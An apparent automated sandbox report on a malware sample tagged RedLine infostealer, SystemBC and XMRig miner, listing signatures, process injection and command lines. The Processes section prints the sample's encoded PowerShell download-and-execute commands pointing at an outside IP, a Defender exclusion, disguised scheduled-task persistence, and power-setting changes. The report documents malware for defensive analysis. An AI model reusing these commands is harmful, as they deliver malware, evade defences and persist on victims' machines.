Malware Analysis Report

2025-04-03 09:47

Sample ID 230506-ft9r5sad6y
Target 0e4e3cdacfbe29fdc3e189e52ee8228e.exe
SHA256 ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84
Tags
systembc xmrig evasion miner trojan redline [ pro ] infostealer persistence spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ac3af6bd3139c444e8e146a6d48c110ae33c09d23c84b7b02f3d7af9eaa49c84

Threat Level: Known bad

The file 0e4e3cdacfbe29fdc3e189e52ee8228e.exe was found to be: Known bad.

Malicious Activity Summary

systembc xmrig evasion miner trojan redline [ pro ] infostealer persistence spyware

RedLine

Suspicious use of NtCreateUserProcessOtherParentProcess

SystemBC

xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

XMRig Miner payload

Blocklisted process makes network request

Downloads MZ/PE file

Identifies Wine through registry keys

Checks computer location settings

Checks BIOS information in registry

Loads dropped DLL

Executes dropped EXE

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Enumerates physical storage devices

Program crash

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Delays execution with timeout.exe

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Suspicious use of SendNotifyMessage

Suspicious behavior: AddClipboardFormatListener

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-06 05:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-06 05:11

Reported

2023-05-06 05:13

Platform

win7-20230220-en

Max time kernel

150s

Max time network

135s

Command Line

C:\Windows\Explorer.EXE

Signatures

SystemBC

trojan systembc

xmrig

miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3948302646-268491222-1934009652-1000\Software\Wine C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 904 set thread context of 112 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 904 set thread context of 2032 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\lsass.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1380 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 1636 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1380 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1636 wrote to memory of 1244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1636 wrote to memory of 1244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1952 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1356 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1584 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 1252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1952 wrote to memory of 328 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1912 wrote to memory of 436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1912 wrote to memory of 436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1912 wrote to memory of 436 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1636 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1636 wrote to memory of 1812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1620 wrote to memory of 904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1620 wrote to memory of 904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1620 wrote to memory of 904 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
PID 1636 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1636 wrote to memory of 1800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1924 wrote to memory of 748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 916 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 1852 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1924 wrote to memory of 668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 316 wrote to memory of 1356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 316 wrote to memory of 1356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 316 wrote to memory of 1356 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 904 wrote to memory of 112 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
PID 1800 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1612 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 1800 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\WerFault.exe
PID 1800 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\WerFault.exe
PID 1800 wrote to memory of 1216 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\WerFault.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe

"C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {A021EA1B-9DC0-4D0C-88A2-BE6616EA8888} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

